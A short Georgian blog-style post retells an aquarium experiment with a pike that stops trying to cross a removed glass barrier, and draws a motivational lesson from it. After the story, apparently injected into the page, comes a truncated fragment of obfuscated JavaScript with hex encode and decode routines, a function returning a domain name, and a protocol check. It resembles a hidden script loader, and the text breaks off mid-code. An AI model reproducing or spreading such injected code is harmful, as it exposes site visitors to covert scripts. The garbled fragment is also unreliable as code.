ფსიქოლოგიური ექსპერიმენტი

დიდ აკვარიუმში ქარიყლაპია მოათავსეს. თავდაპირველად ეს თევზი აკვარიუში თავისუფლად მიმოდიოდა. თუმცა შემდგომ გამჭირვალე სქელი შუშით აკვარიუმი ორ ნაწილად გაყვეს. ქარიყლაპია ამ დაბრკოლებას ვერ ხედავდა და ყოველჯერზე როდესაც აკვარიუმის მე-2 მხარეს მოხვედრას გადაწყვეტდა, იგი წინააღმდეგობას ხვდებოდა. ქარიყლაპია დიდი ხნის განმავლობაში იბრძოდა, რათა ეს უხილავი ბარიერი დაეძლია, თუმცა უშედეგოდ. საბოლოოდ, მას ძალები გამოეცალა და დანებდა. ამ დროს აკვარიუმის გამყოფი შუშა ამოიღეს. თუმცა ქარიყლაპიას აკვარიუმის მე-2 მხარეს მოხვედრა აღარასოდეს უცდია. იგი აკვარიუმის პატარა სივრცეში ცურავდა, როდესაც შეეძლო მთლიანი აკვარიუმით ესარგებლა, თუმცა მას ერთხელაც კი არ უცდია თავის საცხოვრებლის მე-2 მხარეს მოხვედრა.

დამაფიქრებელი ექსპერიმენტია, არა? შესაძლოა ჩვენს ცხოვრებაშიც დიდი ხანია აღარ არსებობს ბარიერები, მაგრამ წარსული გამოცდილება ჩვენს გონებაში ღრმად არის გამჯდარი, არ გვაძლებს იმის შესაძლებლობას, რომ წინ წავიდეთ და განვითარდეთ! იქნებ, მხოლოდ ერთი ნაბიჯის გაკეთებაღა გვჭირდება…

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply